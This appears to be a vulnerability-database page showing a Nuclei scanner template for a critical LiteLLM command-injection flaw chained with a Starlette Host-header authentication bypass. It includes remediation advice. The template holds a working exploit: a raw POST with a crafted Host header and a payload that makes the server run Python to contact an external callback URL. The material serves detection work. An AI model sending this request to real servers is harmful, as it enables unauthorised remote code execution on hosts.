Lucene search
K

LiteLLM - Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

LiteLLM exposes unauthenticated remote code execution via MCP stdio test endpoint, bypass chain.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-48710
28 May 202609:57
githubexploit
GithubExploit
Exploit for Command Injection in Litellm
20 May 202601:12
githubexploit
ATTACKERKB
CVE-2026-42271
8 May 202603:35
attackerkb
ATTACKERKB
CVE-2026-48710
26 May 202621:54
attackerkb
AlpineLinux
CVE-2026-48710
26 May 202621:54
alpinelinux
BDU FSTEC
The vulnerability of the Request Header Handler component of the ASGI framework in web development for Starlette allows attackers to circumvent existing security restrictions.
28 May 202600:00
bdu_fstec
Chainguard
CVE-2026-42271 vulnerabilities
6 May 202619:17
cgr
Chainguard
CVE-2026-48710 vulnerabilities
13 Jun 202601:18
cgr
Circl
CVE-2026-42271
8 May 202604:40
circl
Circl
CVE-2026-48710
26 May 202607:49
circl
Rows per page
id: CVE-2026-42271

info:
  name: LiteLLM - Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    A critical unauthenticated remote code execution vulnerability exists in LiteLLM due to improper input handling in the MCP stdio test endpoint. An attacker can send a specially crafted request to the `/mcp-rest/test/connection` endpoint with controlled parameters, resulting in arbitrary command execution on the server. When combined with an authentication bypass technique—such as the Starlette BadHost flaw (CVE-2026-48710)—an unauthenticated attacker can exploit the chain to execute commands as the server process. Exploitation allows an attacker to spawn processes with the privileges of the LiteLLM server, potentially leading to complete compromise of the host.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary commands on affected LiteLLM instances, potentially leading to full system compromise, lateral movement, data theft, and persistent access.
  remediation: |
    Upgrade LiteLLM to version 1.83.7 or later to remediate this vulnerability. If immediate patching is not possible, restrict access to the `/mcp-rest/test/connection` endpoint and ensure authentication verification is robust.
  reference:
    - https://horizon3.ai/attack-research/vulnerabilities/cve-2026-42271-chained-with-cve-2026-48710/
    - https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g
    - https://github.com/BerriAI/litellm/pull/25343
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42271
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42271
    epss-score: 0.80188
    epss-percentile: 0.9957
    cwe-id: CWE-77
  metadata:
    max-request: 1
    vendor: berriai
    product: litellm
  tags: cve,cve2026,litellm,rce,command-injection,mcp,starlette,kev,vkev

variables:
  payload: '{"transport":"stdio","command":"python","args":["-c","import urllib.request;urllib.request.urlopen(''https://{{interactsh-url}}'')"]}'

http:
  - raw:
      - |
        POST /mcp-rest/test/connection HTTP/1.1
        Host: a/?x=
        Content-Type: application/json
        Content-Length: {{len(payload)}}

        {{payload}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Failed to connect to MCP server"

      - type: status
        status:
          - 200

      - type: word
        part: interactsh_protocol
        words:
          - "http"

    extractors:
      - type: kval
        kval:
          - interactsh_ip
# digest: 4a0a00473045022100bf58a68b1215250f5a9ad4802a695a2df7f63aa12e06663c9d22b7ed95c4807802206ec4a442e8bd7fa1b3528a98dac89e17f5dd654dd4059f745b7ee829009859ea:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jun 2026 16:26Current
7.4High risk
Vulners AI Score7.4
CVSS 3.18.8
CVSS 48.7
EPSS0.80188
SSVC
12